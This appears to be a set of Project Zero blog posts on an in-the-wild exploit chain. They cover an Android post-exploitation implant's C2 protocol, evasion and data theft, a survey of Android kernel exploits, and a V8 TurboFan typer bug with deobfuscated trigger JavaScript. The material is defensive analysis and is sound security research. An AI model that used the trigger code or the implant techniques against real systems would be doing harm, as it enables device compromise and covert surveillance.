There are two main functions that are used to interact with this hashtable throughout the binary: we’ll call them getValueFromHashtable and putValueInHashtable. Both functions take four arguments: pointer to the hashtable manager, pointer to the key (usually represented as an offset from the beginning of the decrypted keys block), a pointer for the value, and an int for the value length. Through the rest of this post, I will refer to values that are stored in the hash table. Because the key is a series of 0x10 bytes, I will refer to values as “the value for offset 0x20 in the hash table”. This means the value that is stored in the hashtable for the “key” that is 0x10 bytes and begins at the address of the start of the decrypted keys block + 0x20.
Each entry in the hashtable has the following structure.
struct hashtable_entry { BYTE * key_ptr; uint key_len; uint in_use; BYTE * value_ptr; uint value_len; }; |
I have documented the majority of the entries in the hashtable here. I use the key’s offset from the beginning of the decrypted keys block as the “key” instead of typing out the series of 0x10 bytes. As shown in the linked sheet, the hashtable contains the dynamic variables that stage 3 needs to keep track of. For example, the filename where to save stage 4 and the install and failure counts.
The hashtable is periodically written to a file named uierrors.txt as described in the Persistence section. This is to save state in case the process exits.
The whole exploit chain diligently cleans up after itself to leave as few indicators as possible of its presence. However, stage 3 does save a couple of files and adds environment variables in order to function. This is in addition to the stage 4 code which will be discussed in the “Executing the Next Stage” section. Each of the files and variables described in this section will be deleted as soon as they’re no longer needed, but they will be on a device for at least a period of time. For each of the files that are saved to the device, the directory path is often randomly selected from a set of potential paths. This makes it more time consuming for an analyst to detect the presence of the file on a device because the analyst would have to check 5 different paths for each file rather than 1.
During startup, the code will record the current time in a file named state.parcel. After it records the current time at the beginning of the file, it will then check how many times per day this has been done by reading all of the times currently in the file. If there are less than 6 entries for the current day, the code proceeds. If there are 6 entries in the file from the current day and there are at least 5 entries for each of the previous 3 days, the binary will set a variable that will tell the code to clean up and exit. If there are 6 entries for the current day and there’s at least one entry for each of the past 3 days, the binary will clean up the persistent files for both this and other stages and then do a max sleep: sleep(0xFFFFFFFF), which is the equivalent of sleeping for over 136 years.
If the effective UID is 0 (root), then the code will randomly choose one of the following paths to write the file to:
If the effective UID is not 0, then the state.parcel file will be written to whatever directory the binary is executing out of according to /proc/self/exe. The contents in state.parcel are obfuscated by XOR’ing each entry with 0xFF12EE34.
Stage 3 periodically writes the hash table that contains configuration and static information to a file named uierrors.txt. The code uses the same process as for state.parcel to decide which directory to write the file too.
Whenever the hashtable is written to uierrors.txt it is encrypted using AES256. The key is the same AES key used to decrypt the configuration settings data block, but it generates a set of 0x10 random bytes to use as the IV. The IV is written to the uierrors.txt file first and then is followed by the encrypted hash table contents. The CRC32 of the encrypted contents of the file is written to the file as the last 4 bytes.
On start-up, stage 3 will remove the majority of the environment variables set by the previous stage. It then sets its own new environment variables.
Environment Variable Name | Value |
abc | Address of the decryption data block |
def | Address of the function that will send logging messages to the C2 server |
def2 | Address of the function that adds logging messages to the error and/or informational logging message queues |
ghi | Points the the decrypted block of hashtable keys |
ddd | Address of the function that performs inflate (decompress) |
ccc | Address of the function that performs deflate (compress) |
0x10 bytes at 0x228CC | ??? |
0x10 bytes at 0x228DC | Pointer to the string representation of the hex_d_uuid |
0x10 bytes at 0x228F0 | Pointer to the C2 domain URL |
0x10 bytes at 0x22904 | Pointer to the port string for the C2 server |
0x10 bytes at 0x22918 | Pointer to the beginning of the certificate |
0x10 bytes at 0x2292C | 0x1000 |
0x10 bytes at 0x22940 | Pointer to +4AA in decrypted data block |
0x10 bytes at 0x22954 | 0x14 |
0x10 bytes at 0x22698 | Pointer to the user-agent string |
PPR | Selinux status such as “selinux-init-read-fail” or “selinux-no-mdm” |
PPMM | Set if there is no “persist.security.mdm.policy” string in /init |
PPQQ | Set if the “persist.security.mdm.policy” string is in /init |
The binary has a very detailed and mature logging mechanism. It tracks both “error” and “informational” logging messages. These messages are saved until they’re sent to the C2 server either when stage 3 is automatically reaching out to the C2 server, or “on-demand” by calling the subroutine that is saved as environment variable “def”. The subroutine saved as environment variable “def2”, adds messages to the error and/or informational message queues. There are hundreds of different logging messages throughout the binary. I have documented the meaning of some of the different logging codes here.
This code is very diligent with trying to clean up its tracks, both while it's running and once it finishes. While it’s running, the binary forks a new process which runs code that is responsible for cleaning up logs while the other code is executing. This other process does the following to clean up stage 3’s tracks:
There are also a couple of different functions that clean up all potential dropped files from both this stage and other stages and remove the set environment variables.
The whole point of this binary is to download the next stage from the command and control (C2) server. Once the previous unpacking steps and checks are completed, the binary will begin preparing the network communications. First the binary will perform a DNS test, then gather device information, and send the POST request to the C2 server. If all these steps are successful, it will receive back the next stage and prepare to execute that.
Prior to reaching out to the C2 server, the binary performs a DNS test. It takes a pointer to the decrypted data block as its argument. First the function generates a random hostname that is between 8-16 lowercase latin characters. It then calls getaddrinfo on this random hostname. It’s trying to find a host that will cause getaddrinfo to return EAI_NODATA, meaning that no address information could be found for that host. It will attempt 3 different addresses before it will bail if none of them return EAI_NODATA. Some disconnected analysis sandboxes will respond to all hostnames and so the code is trying to detect this type of malware analysis environment.
Once it finds a hostname that returns EAI_NODATA, stage 3 does a DNS query with that hostname. The DNS server address is found in the decrypted block in argument 1 at offset 0x14C7. In this binary that is 8.8.8.8:53, the Google DNS server. The code will connect to the DNS server via a socket and then send a Type A query for the randomly generated host name and parse the response. The only acceptable response from the server is NXDomain, meaning “Non-Existent Domain”. If the code receives back NXDomain from the DNS server, it will proceed with the code path that communicates with the C2 Server.
The C2 server hostname and port is read from the decrypted data block. The port number is at offset 0x84 and the hostname is at offset 0x4.
The binary first connects via a socket to the C2 server, then connects with SSL/TLS. The SSL/TLS certificate, a root certificate, is also in the decrypted data block at offset 0x4C7. The binary uses the OpenSSL library.
Once it successfully connects to the C2 server via SSL/TLS, the binary will then begin collecting all the device information that it would like to send to the C2 server. The code collects A LOT of data to be sent to the C2 server. Six different sets of information are collected, formatted, compressed, and encrypted prior to sending to the remote server. The different “sets” of data that are collected are:
For this set, the binary is collecting device characteristics such as the Android version, the serial number, model, battery temperature, st_mode of /dev/mem and /dev/kmem, the contents of /proc/net/arp and /proc/net/route, and more. The full list of device characteristics that are collected and sent to the server are documented here.
The binary uses a few different methods for collecting this data. The most common is to read system properties. They have 2 different ways to read system properties:
To get the device ID, subscriber ID, and MSISDN, the binary uses the service call shell command. To call a function from a service using this API, you need to know the code for the function. Basically, the code is the number that the function is listed in the AIDL file. This means it can change with each new Android release. The developers of this binary hardcoded the service code for each android SDK version from 8 (Froyo) through 29 (Android 10). For example, the getSubscriberId code in the iphonesubinfo service is 3 for Android SDK version 8-20, the code is 5 for SDK version 21, and the code is 7 for SDK versions 22-29.
The code also collects detailed networking information. For example, it collects the MAC address and IP address for each interface listed under the /sys/class/net/ directory.
To collect information about the applications installed on the device, the binary will send all of the contents of /data/system/packages.xml to the C2 server. This XML file includes data about both the user-installed and the system-installed packages on the device.
To gather information about the physical location of the device, the binary runs dumpsys location in a shell. It sends the full output of this data back to the C2 server. The output of the dumpsys location command includes data such as the last known GPS locations.
The binary collects information about the status of the exploits and subsequent stages (including this one) to send back to the C2 server. Most of these values are obtained from the hash storage table. There are 22 value pairs that are sent back to the server. These values include things such as the installation time and the “repair count”, the build id, and the major and minor version numbers for the binary. The full set of data that is sent to the C2 server is available here.
The binary sends information about every single running process back to the C2 server. It will iterate through each directory under /proc/ and send back the following information for each process:
As described in the Error Processing section, whenever the binary encounters an error, it creates an error message. The binary will send a maximum of 0x1F of these error messages back to the C2 server. It will also send a maximum of 0x1F “informational” messages back to the server. “Info” messages are similar to the error messages except that they are documenting a condition that is less severe than an error. These are distinctions that the developers included in their coding.
Once all of the “sets” of information are collected, they are compressed using the deflate function. The compressed “messages” each have the following compressedMessage structure. The messageCode is a type of identification code for the information that is contained in the message. It’s calculated by calculating the crc32 value for the 0x10 bytes at offset 0x1CD8 in the decrypted data block and then adding the “identification code”.
struct compressedMessage { uint compressedDataLength; uint uncompressedDataLength; uint messageCode; BYTE * dataPointer; BYTE[4096] data; }; |
Once each of the messages, or sets of data, have been individually compressed into the compressedMessage struct, the byte order is swapped to change the endianness and then the data is all encrypted using AES256. The key from the decrypted data block is used and the IV is a set of 0x10 random bytes. The IV is prepended to the beginning of the encrypted message.
The data is sent to the server as a POST request. The full header is shown below.
POST /api2/v9/pass HTTP/1.1 User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-G600FY Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.0 Chrome/38.0.2125.102 Mobile Safari/537.3 Host: REDACTED:443 Connection: keep-alive Content-Type:application/octet-stream Content-Length:%u Cookie: %s |
The “Cookie” field is two values from the decrypted data block: sid and uid. The values for these two keys are base64 encoded values from the decrypted data block.
The body of the POST request is all of the data collected and compressed in the section above. This request is then sent to the C2 server via the SSL/TLS connection.
The response received back from the server is parsed. If the HTTP Response Code is not 200, it’s considered an error. The received data is first decrypted using AES256. The key used is the key that is included in the decrypted data block at offset 0x48A and the IV is sent back as the first 0x10 bytes of the response. After being decrypted, the byte order is swapped using bswap32 and the data is then decompressed using inflate. This inflated response body is an executable file or a series of commands.
The binary will also store and delete cookies for the C2 server domain and the exploit server domain. First, the binary will delete the cookie for the hostname of the exploit server that is the following name/value pair: session=<XXX>. This name/value is hardcoded into the decrypted data block within the binary. Then it will re-add that same cookie, but with an updated last accessed time and expire time.
As stated previously, stage 3’s role in the exploit chain is to check that the binary is not being analyzed and if not, collect detailed device data and send it to the C2 server to receive back the next stage of code and commands that should be executed. The detailed information that is sent back to the C2 server is likely used for high-fidelity targeting.
The developers of stage 3 purposefully built in a variety of different ways that the next stage of code can be executed: a series of commands passed to system or a shared library ELF file which can be executed by calling dlopen and dlsym, and more. This section will detail the different ways that the C2 server can instruct stage 3 to save and begin executing the next stage of code.
If the POST request to the C2 server is successful, the code will receive back either an executable file or a set of commands which it’ll “process”. The response is parsed differently based on the “message code” in the header of the response. This “message code” is similar to what was described in the “Constructing the Request” section. It’s an identification code + the CRC32 of the 0x10 bytes at 0x25E30. When processing the response, the binary calculates the CRC32 of these bytes again and subtracts them from the message code. This value is then used to determine how to treat the contents of the response. The majority of the message codes distinguish different ways for the response to be saved to the device and then be executed.
There are a few functions that are commonly used by multiple message codes, so they are described here first.
func1 - Writes the response contents to files in both the /data/dalvik-cache/arm and /mnt directories.
This function does the following:
func2 - Fork child process and inject code using ptrace.
This function forks a new process where the child will call the function init from an ELF library, then the parent will inject the code from the response into the child process using ptrace. The ELF library that is opened with dlopen and then init is called on is named /system/bin/%016lx%016lx with both values being the address of the buffer pointer.
func3 - Writes the buffer of the reply contents to file and sets the permissions and SELinux attributes.
This function will write the buffer to either the provided file path in the third argument or it will generate a new file path. If it’s generating a new temporary file name, the code will go down the following list of directory names beginning with /cache in the first directory that it can stat, it will create the temporary file using mkstemp(“%s/XXXXXX”).
After the new file is created, the code sets the permissions on the file path to those supplied to the function as the fourth argument. Then it will set the SELinux attributes of the file to those passed in in the fifth argument.
The following section gives a simplified summary of how the response from the C2 server is handled based on the response’s message code:
That concludes our analysis of Stage 3 in the Android exploit chain. We hypothesize that each Stage 2 (and thus Stage 3) includes different configuration variables that would allow the attackers to identify which delivered exploit chain is calling back to the C2 server. In addition, due to the detailed information sent to the C2 prior to stage 4 being returned to the device it seems unlikely that we would successfully determine the correct values to have a “legitimate” stage 4 returned to us.
It’s especially fascinating how complex and well-engineered this stage 3 code is when you consider that the attackers used all publicly known n-days in stage 2. The attackers used a Google Chrome 0-day in stage 1, public exploit for Android n-days in stage 2, and a mature, complex, and thoroughly designed and engineered stage 3. This leads us to believe that the actor likely has more device-specific 0-day exploits.
This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 6: Windows Exploits.
Published: 2021-01-12 17:37:00
Popularity: 21
Author: Ryan
This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.
Posted by Mark Brand, Project Zero
A survey of the exploitation techniques used by a high-tier attacker against Android devices in 2020
After one of the Chrome exploits has been successful, there are several (quite simple) stages of payload decryption that occur. Once we've got through that, we reach a much more complex binary that is clearly the result of some engineering work. Thanks to that engineering it's very simple for us to locate and examine the exploits embedded inside! For each privilege elevation, they have a function in the .init_array which will register it into a global list which they later use -- this makes it easy for them to plug-and-play additional exploits into their framework, but is also very convenient for us when reverse-engineering their framework:
Each of the "xyz_register" functions looks like the following, adding an entry to the global list with a probe function used to check whether the device is vulnerable to the given exploit, and to estimate likelihood of success, and an exploit function used to launch the exploit. These probe functions are then used to dynamically determine the best exploit to use based on runtime information about the target device.
Looking at the probe functions gives us an idea of which devices are supported, but we can already see something fairly surprising: this attacker is using entirely public exploits for their privilege elevations. Of course, we can't tell for sure that they didn't know about any of these bugs prior to the original public disclosures; but their exploit configuration structure contains an internal "name" describing the exploit, and those map very neatly to either public naming ("iovy", "cow") or CVE numbers ("0569", "0820" for exploits targeting CVE-2015-0569 and CVE-2016-0820 respectively), suggesting that these exploits were very likely developed after those public disclosures and not before.
In addition, as we'll see below, most of the exploits are closely related to public exploits or descriptions of techniques used to exploit the bugs -- adding further weight to the theory that these exploits were implemented well after the original patches were shipped.
Of course, it's important to note that we had a narrow window of opportunity during which we were capturing these exploit chains, and it wasn't possible for us to exhaustively test with different devices and patch levels. It's entirely possible that this attacker also has access to Android 0-day privilege elevations, and we just failed to extract those from the server before being detected. Nonetheless, it's certainly an interesting data-point to see an attacker pairing a sophisticated 0-day exploit for Chrome with, well, a load of bugs patched between 2 and 5 years ago.
Anyway, without further ado let's take a look at the exploits they did fit in here!
addr_limit pipe kernel read-write: By corrupting the addr_limit variable in the task_struct, this technique gives a user-mode process the ability to read and write arbitrary kernel memory by passing kernel pointers when reading to and writing from a pipe.
Userspace shellcode: PXN support on 32-bit Android devices is quite rare, so on most 32-bit devices it was/is still possible to directly execute shellcode from the user-mode portion of the address space. See KEEN Lab "Emerging Defense in Android Kernel" for more information.
Point to userspace memory: PAN support is not ubiquitous on 64-bit Android devices, so it was (on older Android versions) often possible even on 64-bit devices for a kernel exploit to use this technique. See KEEN Lab "Emerging Defense in Android Kernel" for more information.
The vulnerabilities:
CVE-2015-1805 is a vulnerability in the Linux kernel handling read/write for pipe iovectors, leading to the use of an out-of-bounds struct iovec.
CVE-2016-3809 is an information leak, disclosing the address of a kernel sock structure.
Strategy: Heap-spray with fake iovectors using sendmmsg, race write, readv and mmap/munmap to trigger the vulnerability. This produces a single-use kernel write-what-where.
Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then corrupt the socket member of the sock structure to point to userspace memory containing a fake structure (and function pointer table); execute userspace shellcode, elevating privileges.
Copy/Paste: ~90%. The exploit strategy is the same as public exploit code, and it looks like this was used as a starting point. The authors did some additional work, presumably to increase portability and stability, and the subsequent flow doesn't match any existing public exploit (that I found), but all of the techniques are publicly known.
Additional References: KEEN Lab "Talk is Cheap, Show Me the Code".
The vulnerabilities: Same as iovy, plus:
P0-822 is an information leak, allowing the reading of arbitrary kernel memory.
Strategy: Same as above.
Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, and use P0-822 to leak the address of the function pointer table associated with the socket. Then use P0-822 again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.
Copy/Paste: ~70%. The exploit strategy is the same as above, building the same primitive as the public exploit (addr_limit pipe kernel read-write). Instead of the public approach, they leverage the two additional vulnerabilities, which had public code available. It seems like the development of this exploit was copy/paste integration of the alternative memory-leak primitives, probably to increase portability. The code used for P0-822 is direct copy-paste (inner loop shown below).
The vulnerabilities: Same as iovy.
Strategy: Heap-spray with pipe buffers. One thread each for read/write/readv/writev and the usual mmap/munmap thread. Modify all of the pipe buffers, and then run either "read and writev" or "write and readv" threads to get a reusable kernel read-write.
Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then use kernel-read to leak the address of the function pointer table associated with the socket. Use kernel-read again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.
Copy/Paste: ~30%. The heap-spray technique is the same as another public exploit, but there is significant additional synchronization added to support multiple reads and writes. There's not really enough unique commonality to determine whether the authors started with that code as a reference or not.
The vulnerability: According to the release notes, CVE-2015-0569 is a heap overflow in Qualcomm's wireless extension IOCTLs. This appears to be where the exploit name is derived from; however as you can see at the Qualcomm advisory, there were actually 15 commits here under 3 CVEs, and the exploit appears to actually target one of the stack overflows, which was patched as CVE-2015-0570.
Strategy: Corrupt return address; return to userspace shellcode.
Subsequent flow: The shellcode corrupts addr_limit, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.
Copy/Paste: 0%. This bug is trivial to exploit for non-PXN targets, so there would be little to gain by borrowing code.
Additional References: KEEN Lab "Rooting every Android".
The vulnerability: CVE-2016-0820, a linear data-section overflow resulting from a lack of bounds checking.
Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the KEEN Lab presentation.
Copy/Paste: ~20%. The only public code we could find for this is the PoC attached to our bugtracker - it seems most likely that this was an independent implementation written after KEEN lab's presentation and based on their description.
Additional References: KEEN Lab "Rooting every Android".
The vulnerability: CVE-2016-5195, also known as DirtyCOW.
Strategy: Depending on the system configuration their exploit will choose between using /proc/self/mem or ptrace for the write thread.
Subsequent flow: There are several different exploitation strategies depending on the target environment, and the full exploitation process here is a fairly complex state-machine involving several hops into different processes, which is likely necessary to support launching the exploit from within an isolated app context.
Copy/Paste: ~5%. The basic code necessary to exploit CVE-2016-5195 was probably copied from one of the many public sources, but the majority of the complexity here is in what is done next, and this doesn't seem to be similar to any of the public Android exploits.
The vulnerability: CVE-2018-9568, also known as WrongZone.
Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the Baidu Security Lab blog post.
Copy/Paste: ~20%. The code doesn't seem to match the publicly available exploit code for this bug, and it seems most likely that this was an independent implementation written after Baidu's blog post and based on their description.
Additional References: Alibaba Security "From Zero to Root".
Baidu Security Lab: "KARMA shows you offense and defense".
Nothing very interesting, which is interesting in itself!
Here is an attacker who has access to 0day vulnerabilities in Chrome and Windows, and the ability to develop new and very reliable exploitation techniques in order to exploit these vulnerabilities -- and yet their Android privilege elevation capabilities appear to consist entirely of exploits using public, documented techniques and n-day vulnerabilities.
It certainly seems like they have the capability to write Android exploits. The exploits seem to be based on publicly available source code, and their implementations are based on exploitation strategies described in public sources.
One explanation for this would be that they serve different payloads depending on the targeting, and we were only receiving a "low-value" privilege-elevation capability. Alternatively, perhaps exploit server URLs that we had access to were specifically configured for a user that they know uses an older device that would be vulnerable to one of these exploits?
Based on all the information available, it's likely that they have more device-specific 0day exploits. We might just not have tested with a device/firmware version that they supported for those exploits and inadvertently missed their more modern exploits.
About the only solid conclusion that we can make is that attackers clearly still see value in developing and maintaining exploits for fairly old Android vulnerabilities, to the extent of supporting those devices long past when their original manufacturers provide support for them.
This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 5: Android Post-Exploitation.
Published: 2021-01-12 17:36:00
Popularity: 8
Author: Ryan
This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.
Posted by Sergei Glazunov, Project Zero
This post only covers one of the exploits, specifically a renderer exploit targeting Chrome 73-78 on Android. We use it as an opportunity to talk about an interesting vulnerability class in Chrome’s JavaScript engine.
One of the features that make JavaScript code especially difficult to optimize is the dynamic type system. Even for a trivial expression like a + b the engine has to support a multitude of cases depending on whether the parameters are numbers, strings, booleans, objects, etc. JIT compilation wouldn’t make much sense if the compiler always had to emit machine code that could handle every possible type combination for every JS operation. Chrome’s JavaScript engine, V8, tries to overcome this limitation through type speculation. During the first several invocations of a JavaScript function, the interpreter records the type information for various operations such as parameter accesses and property loads. If the function is later selected to be JIT compiled, TurboFan, which is V8’s newest compiler, makes an assumption that the observed types will be used in all subsequent calls, and propagates the type information throughout the whole function graph using the set of rules derived from the language specification. For example: if at least one of the operands to the addition operator is a string, the output is guaranteed to be a string as well; Math.random() always returns a number; and so on. The compiler also puts runtime checks for the speculated types that trigger deoptimization (i.e., revert to execution in the interpreter and update the type feedback) in case one of the assumptions no longer holds.
For integers, V8 goes even further and tracks the possible range of nodes. The main reason behind that is that even though the ECMAScript specification defines Number as the 64-bit floating point type, internally, TurboFan always tries to use the most efficient representation possible in a given context, which could be a 64-bit integer, 31-bit tagged integer, etc. Range information is also employed in other optimizations. For example, the compiler is smart enough to figure out that in the following code snippet, the branch can never be taken and therefore eliminate the whole if statement:
a = Math.min(a, 1); if (a > 2) { return 3; } |
Now, imagine there’s an issue that makes TurboFan believe that the function vuln() returns a value in the range [0; 2] whereas its actual range is [0; 4]. Consider the code below:
a = vuln(a); let array = [1, 2, 3]; return array[a]; |
If the engine has never encountered an out-of-bounds access attempt while running the code in the interpreter, it will instruct the compiler to transform the last line into a sequence that at a certain optimization phase, can be expressed by the following pseudocode:
if (a >= array.length) { deoptimize(); } let elements = array.[[elements]]; return elements.get(a); |
get() acts as a C-style element access operation and performs no bounds checks. In subsequent optimization phases the compiler will discover that, according to the available type information, the length check is redundant and eliminate it completely. Consequently, the generated code will be able to access out-of-bounds data.
The bug class outlined above is the main subject of this blog post; and bounds check elimination is the most popular exploitation technique for this class. A textbook example of such a vulnerability is the off-by-one issue in the typer rule for String.indexOf found by Stephen Röttger.
A typer vulnerability doesn’t have to immediately result in an integer range miscalculation that would lead to OOB access because it’s possible to make the compiler propagate the error. For example, if vuln() returns an unexpected boolean value, we can easily transform it into an unexpected integer:
a = vuln(a); // predicted = false; actual = true a = a * 10; // predicted = 0; actual = 10 let array = [1, 2, 3]; return array[a]; |
Another notable bug report by Stephen demonstrates that even a subtle mistake such as omitting negative zero can be exploited in the same fashion.
At a certain point, this vulnerability class became extremely popular as it immediately provided an attacker with an enormously powerful and reliable exploitation primitive. Fellow Project Zero member Mark Brand has used it in his full-chain Chrome exploit. The bug class has made an appearance at several CTFs and exploit competitions. As a result, last year the V8 team issued a hardening patch designed to prevent attackers from abusing bounds check elimination. Instead of removing the checks, the compiler started marking them as “aborting”, so in the worst case the attacker can only trigger a SIGTRAP.
The renderer exploit we’ve discovered takes advantage of an issue in a function designed to compute the type of induction variables. The slightly abridged source code below is taken from the latest affected revision of V8:
Type Typer::Visitor::TypeInductionVariablePhi(Node* node) { [...] // We only handle integer induction variables (otherwise ranges // do not apply and we cannot do anything). if (!initial_type.Is(typer_->cache_->kInteger) || !increment_type.Is(typer_->cache_->kInteger)) { // Fallback to normal phi typing, but ensure monotonicity. // (Unfortunately, without baking in the previous type, // monotonicity might be violated because we might not yet have // retyped the incrementing operation even though the increment's // type might been already reflected in the induction variable // phi.) Type type = NodeProperties::IsTyped(node) ? NodeProperties::GetType(node) : Type::None(); for (int i = 0; i < arity; ++i) { type = Type::Union(type, Operand(node, i), zone()); } return type; } // If we do not have enough type information for the initial value // or the increment, just return the initial value's type. if (initial_type.IsNone() || increment_type.Is(typer_->cache_->kSingletonZero)) { return initial_type; } [...] InductionVariable::ArithmeticType arithmetic_type = induction_var->Type(); double min = -V8_INFINITY; double max = V8_INFINITY; double increment_min; double increment_max; if (arithmetic_type == InductionVariable::ArithmeticType::kAddition) { increment_min = increment_type.Min(); increment_max = increment_type.Max(); } else { DCHECK_EQ(InductionVariable::ArithmeticType::kSubtraction, arithmetic_type); increment_min = -increment_type.Max(); increment_max = -increment_type.Min(); } if (increment_min >= 0) { // increasing sequence min = initial_type.Min(); for (auto bound : induction_var->upper_bounds()) { Type bound_type = TypeOrNone(bound.bound); // If the type is not an integer, just skip the bound. if (!bound_type.Is(typer_->cache_->kInteger)) continue; // If the type is not inhabited, then we can take the initial // value. if (bound_type.IsNone()) { max = initial_type.Max(); break; } double bound_max = bound_type.Max(); if (bound.kind == InductionVariable::kStrict) { bound_max -= 1; } max = std::min(max, bound_max + increment_max); } // The upper bound must be at least the initial value's upper // bound. max = std::max(max, initial_type.Max()); } else if (increment_max <= 0) { // decreasing sequence [...] } else { // Shortcut: If the increment can be both positive and negative, // the variable can go arbitrarily far, so just return integer. return typer_->cache_->kInteger; } [...] return Type::Range(min, max, typer_->zone()); } |
Now, imagine the compiler processing the following JavaScript code:
for (var i = initial; i < bound; i += increment) { [...] } |
In short, when the loop has been identified as increasing, the lower bound of initial becomes the lower bound of i, and the upper bound is calculated as the sum of the upper bounds of bound and increment. There’s a similar branch for decreasing loops, and a special case for variables that can be both increasing and decreasing. The loop variable is named phi in the method because TurboFan operates on an intermediate representation in the static single assignment form.
Note that the algorithm only works with integers, otherwise a more conservative estimation method is applied. However, in this context an integer refers to a rather special type, which isn’t bound to any machine integer type and can be represented as a floating point value in memory. The type holds two unusual properties that have made the vulnerability possible:
Thus, for the following loop the algorithm infers (-Infinity; +Infinity) as the induction variable type, while the actual value after the first iteration of the loop will be NaN:
for (var i = -Infinity; i < 0; i += Infinity) { } |
This one line is enough to trigger the issue. The exploit author has had to make only two minor changes: (1) parametrize increment in order to make the value of i match the future inferred type during initial invocations in the interpreter and (2) introduce an extra variable to ensure the loop eventually ends. As a result, after deobfuscation, the relevant part of the trigger function looks as follows:
function trigger(argument) { var j = 0; var increment = 100; if (argument > 2) { increment = Infinity; } for (var i = -Infinity; i <= -Infinity; i += increment) { j++; if (j == 20) { break; } } [...] |
The resulting type mismatch, however, doesn’t immediately let the attacker run arbitrary code. Given that the previously widely used bounds check elimination technique is no longer applicable, we were particularly interested to learn how the attacker approached exploiting the issue.
The trigger function continues with a series of operations aimed at transforming the type mismatch into an integer range miscalculation, similarly to what would follow in the previous technique, but with the additional requirement that the computed range must be narrowed down to a single number. Since the discovered exploit targets mobile devices, the exact instruction sequence used in the exploit only works for ARM processors. For the ease of the reader, we've modified it to be compatible with x64 as well.
[...] // The comments display the current value of the variable i, the type // inferred by the compiler, and the machine type used to store // the value at each step. // Initially: // actual = NaN, inferred = (-Infinity, +Infinity) // representation = double i = Math.max(i, 0x100000800); // After step one: // actual = NaN, inferred = [0x100000800; +Infinity) // representation = double i = Math.min(0x100000801, i); // After step two: // actual = -0x8000000000000000, inferred = [0x100000800, 0x100000801] // representation = int64_t i -= 0x1000007fa; // After step three: // actual = -2042, inferred = [6, 7] // representation = int32_t i >>= 1; // After step four: // actual = -1021, inferred = 3 // representation = int32_t i += 10; // After step five: // actual = -1011, inferred = 13 // representation = int32_t [...] |
The first notable transformation occurs in step two. TurboFan decides that the most appropriate representation for i at this point is a 64-bit integer as the inferred range is entirely within int64_t, and emits the CVTTSD2SI instruction to convert the double argument. Since NaN doesn’t fit in the integer range, the instruction returns the “indefinite integer value” -0x8000000000000000. In the next step, the compiler determines it can use the even narrower int32_t type. It discards the higher 32-bit word of i, assuming that for the values in the given range it has the same effect as subtracting 0x100000000, and then further subtracts 0x7fa. The remaining two operations are straightforward; however, one might wonder why the attacker couldn’t make the compiler derive the required single-value type directly in step two. The answer lies in the optimization pass called the constant-folding reducer.
Reduction ConstantFoldingReducer::Reduce(Node* node) { DisallowHeapAccess no_heap_access; if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) && node->op()->HasProperty(Operator::kEliminatable) && node->opcode() != IrOpcode::kFinishRegion) { Node* constant = TryGetConstant(jsgraph(), node); if (constant != nullptr) { ReplaceWithValue(node, constant); return Replace(constant); [...] |
If the reducer discovered that the output type of the NumberMin operator was a constant, it would replace the node with a reference to the constant thus eliminating the type mismatch. That doesn’t apply to the SpeculativeNumberShiftRight and SpeculativeSafeIntegerAdd nodes, which represent the operations in steps four and five while the reducer is running, because they both are capable of triggering deoptimization and therefore not marked as eliminable.
Formerly, the next step would be to abuse this mismatch to optimize away an array bounds check. Instead, the attacker makes use of the incorrectly typed value to create a JavaScript array for which bounds checks always pass even outside the compiled function. Consider the following method, which attempts to optimize array constructor calls:
Reduction JSCreateLowering::ReduceJSCreateArray(Node* node) { [...] } else if (arity == 1) { Node* length = NodeProperties::GetValueInput(node, 2); Type length_type = NodeProperties::GetType(length); if (!length_type.Maybe(Type::Number())) { // Handle the single argument case, where we know that the value // cannot be a valid Array length. elements_kind = GetMoreGeneralElementsKind( elements_kind, IsHoleyElementsKind(elements_kind) ? HOLEY_ELEMENTS : PACKED_ELEMENTS); return ReduceNewArray(node, std::vector<Node*>{length}, *initial_map, elements_kind, allocation, slack_tracking_prediction); } if (length_type.Is(Type::SignedSmall()) && length_type.Min() >= 0 && length_type.Max() <= kElementLoopUnrollLimit && length_type.Min() == length_type.Max()) { int capacity = static_cast<int>(length_type.Max()); return ReduceNewArray(node, length, capacity, *initial_map, elements_kind, allocation, slack_tracking_prediction); [...] |
When the argument is known to be an integer constant less than 16, the compiler inlines the array creation procedure and unrolls the element initialization loop. ReduceJSCreateArray doesn’t rely on the constant-folding reducer and implements its own less strict equivalent that just compares the upper and lower bounds of the inferred type. Unfortunately, even after folding the function keeps using the original argument node. The folded value is employed during initialization of the backing store while the length property of the array is set to the original node. This means that if we pass the value we obtained at step five to the constructor, it will return an array with the negative length and backing store that can fit 13 elements. Given that bounds checks are implemented as unsigned comparisons, the сrafted array will allow us to access data well past its end. In fact, any positive value bigger than its predicted version would work as well.
The rest of the trigger function is provided below:
[...] corrupted_array = Array(i); corrupted_array[0] = 1.1; ptr_leak_array = [wasm_module, array_buffer, [...], wasm_module, array_buffer]; extra_array = [13.37, [...], 13.37, 1.234]; return [corrupted_array, ptr_leak_array, extra_array]; } |
The attacker forces TurboFan to put the data required for further exploitation right next to the corrupted array and to use the double element type for the backing store as it’s the most convenient type for dealing with out-of-bounds data in the V8 heap.
From this point on, the exploit follows the same algorithm that public V8 exploits have been following for several years:
The contents of the payload, which is about half a megabyte in size, will be discussed in detail in a subsequent blog post.
